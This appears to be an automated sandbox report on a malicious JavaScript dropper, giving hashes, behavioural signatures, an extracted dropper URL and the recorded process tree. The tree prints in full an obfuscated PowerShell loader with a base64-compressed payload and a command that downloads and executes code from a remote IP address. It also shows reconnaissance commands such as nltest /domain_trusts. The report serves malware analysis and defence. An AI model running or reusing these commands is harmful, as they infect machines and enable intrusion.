Analysis

  • max time kernel
    142s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/01/2023, 07:35

General

  • Target

    55e020dbea48939cdd285ea106713f40bc077e2c.js

  • Size

    43KB

  • MD5

    cd8ce0411e414f67fa7e34b06004314f

  • SHA1

    55e020dbea48939cdd285ea106713f40bc077e2c

  • SHA256

    0442f029601c5925d346260e512770beb5a9a28ef4ac9e2da5d1b0e7d27341a6

  • SHA512

    322b0c0a1166f392150d46f529ab3475954b5255f955e893bffc49c61865a2f953dc3dd598ca13f9954b61fa79bea797ec7e740ab7cab48d6d5dda08d9631e03

  • SSDEEP

    768:4aPlutIv0NmQCjO2rpReJk3zBE5kxuALjWV+yLFz9ohcqJ8H:uK1j1syDaVh9onKH

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://159.203.143.66/r/

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\55e020dbea48939cdd285ea106713f40bc077e2c.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2496
    • C:\wiNDOWS\SYsTEM32\cmD.exe
      "C:\wiNDOWS\SYsTEM32\cmD.exe" /c PoweRSheLL -execUTiONPoLic BypasS "& ((gV '*mDr*').naME[3,11,2]-Join'') ( nEw-oBJecT syStEm.iO.CompREsSiON.defLAtEStReAM( [SYstEM.io.MEmOryStream] [CoNVErT]::FrOmbASe64sTRING('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') , [sYsTEm.io.ComPREsSiOn.coMPreSsioNmODe]::DEcOmPreSs) |fOrEACH-obJEcT{ nEw-oBJecT sySTEM.Io.sTReaMreadeR( $_, [teXt.EnCODInG]::AsCiI)} ).ReaDtoenD( ) "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3804
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PoweRSheLL -execUTiONPoLic BypasS "& ((gV '*mDr*').naME[3,11,2]-Join'') ( nEw-oBJecT syStEm.iO.CompREsSiON.defLAtEStReAM( [SYstEM.io.MEmOryStream] [CoNVErT]::FrOmbASe64sTRING('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') , [sYsTEm.io.ComPREsSiOn.coMPreSsioNmODe]::DEcOmPreSs) |fOrEACH-obJEcT{ nEw-oBJecT sySTEM.Io.sTReaMreadeR( $_, [teXt.EnCODInG]::AsCiI)} ).ReaDtoenD( ) "
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:800
        • C:\Windows\system32\whoami.exe
          "C:\Windows\system32\whoami.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3668
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\2082FD5682FBAA5C.vbs" "iex (iwr -useb http://159.203.143.66/r/emailbill/9E971E81734A276F)"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass iex (iwr -useb http://159.203.143.66/r/emailbill/9E971E81734A276F)
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4004
      • C:\Windows\system32\whoami.exe
        "C:\Windows\system32\whoami.exe"
        3⤵
          PID:3068
        • C:\Windows\system32\systeminfo.exe
          "C:\Windows\system32\systeminfo.exe"
          3⤵
          • Gathers system information
          PID:2356
        • C:\Windows\system32\whoami.exe
          "C:\Windows\system32\whoami.exe" /all
          3⤵
            PID:1712
          • C:\Windows\system32\nltest.exe
            "C:\Windows\system32\nltest.exe" /domain_trusts
            3⤵
              PID:3136
            • C:\Windows\system32\tasklist.exe
              "C:\Windows\system32\tasklist.exe"
              3⤵
              • Enumerates processes with tasklist
              PID:4440
        • C:\Windows\system32\msiexec.exe
          C:\Windows\system32\msiexec.exe /V
          1⤵
            PID:2708
          • C:\Windows\System32\WScript.exe
            C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\2082FD5682FBAA5C.vbs" "iex (iwr -useb http://159.203.143.66/r/emailbill/9E971E81734A276F)"
            1⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4084
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass iex (iwr -useb http://159.203.143.66/r/emailbill/9E971E81734A276F)
              2⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:1204

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            3KB

            MD5

            00e7da020005370a518c26d5deb40691

            SHA1

            389b34fdb01997f1de74a5a2be0ff656280c0432

            SHA256

            a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

            SHA512

            9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\2082FD5682FBAA5C.vbs

            Filesize

            106B

            MD5

            29814eb775761c5088028d1907f48c55

            SHA1

            cb369ec71c0a44b9b9411edf956efbb5654ab26e

            SHA256

            ceb3b2cce642a3dcda3a370c282fd0ae6daf7521a44350d302b4a1351e4ac3db

            SHA512

            a7ebcab691e6bbe52f150de7e1515f341bab3756c0941fc221d1aa40c54983b73158ff4037b11c18e1fddc2e634ea0fd5ab898cf716b02163c10d98159a7b3c1

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            de43a0590ecfcd4ca330b048009d801e

            SHA1

            3ac38c42d5e4ed587dabf5e1a66db763e73f4596

            SHA256

            77d2b32f6cea948cb5c383b7d8816e959fe8f5a17858eaa837647675624300b6

            SHA512

            f1725dd442a13722c8a50b5b4abdabadaa14cafa0b663e4a5912060b45383031ce400a81bff5e3ad7b8df746afd407b23b6caa5fabd6ae1cd496c0551bd109ea

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            8793501facbb5fb5e7d28c9d237329f6

            SHA1

            a8cb95480f087e6fd16345a35bd29687ad705bc4

            SHA256

            b89b73dac95a5cdbf833bb7c187d5865f815e31f37531cf03c1bf7cdfb6caac9

            SHA512

            eabb46d839cb8f6ee465e98f8cc8e0a51ed16f8bb660add7e4f7c34db266d822e6d669a331ca1cf24e8f99723b44f8e78837e036c41ce4a7150b27462972a4b1

          • memory/800-134-0x000001F3F3760000-0x000001F3F3782000-memory.dmp

            Filesize

            136KB

          • memory/800-135-0x00007FFE18450000-0x00007FFE18F11000-memory.dmp

            Filesize

            10.8MB

          • memory/800-137-0x00007FFE18450000-0x00007FFE18F11000-memory.dmp

            Filesize

            10.8MB

          • memory/1204-154-0x00007FFE184D0000-0x00007FFE18F91000-memory.dmp

            Filesize

            10.8MB

          • memory/1204-153-0x00007FFE184D0000-0x00007FFE18F91000-memory.dmp

            Filesize

            10.8MB

          • memory/4004-142-0x00007FFE184D0000-0x00007FFE18F91000-memory.dmp

            Filesize

            10.8MB

          • memory/4004-150-0x00007FFE184D0000-0x00007FFE18F91000-memory.dmp

            Filesize

            10.8MB

          • memory/4004-149-0x000001D1C0F20000-0x000001D1C10E2000-memory.dmp

            Filesize

            1.8MB

          • memory/4004-148-0x00007FFE184D0000-0x00007FFE18F91000-memory.dmp

            Filesize

            10.8MB